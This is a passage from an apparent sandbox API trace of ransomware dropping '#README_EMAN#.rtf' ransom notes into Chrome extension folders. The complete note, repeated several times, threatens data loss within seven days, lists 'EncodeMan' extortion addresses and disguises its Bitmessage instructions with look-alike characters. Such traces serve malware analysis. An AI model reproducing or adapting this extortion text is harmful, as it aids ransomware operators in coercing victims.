n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0289.362] WriteFile (in: hFile=0x2e8, lpBuffer=0x24647a8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24647a8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.362] CloseHandle (hObject=0x2e8) returned 1 [0289.362] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\#readme_eman#.rtf")) returned 0x20 [0289.362] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\#readme_eman#.rtf")) returned 0xffffffff [0289.362] GetLastError () returned 0x2 [0289.362] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0289.665] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.665] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.665] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24647a8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 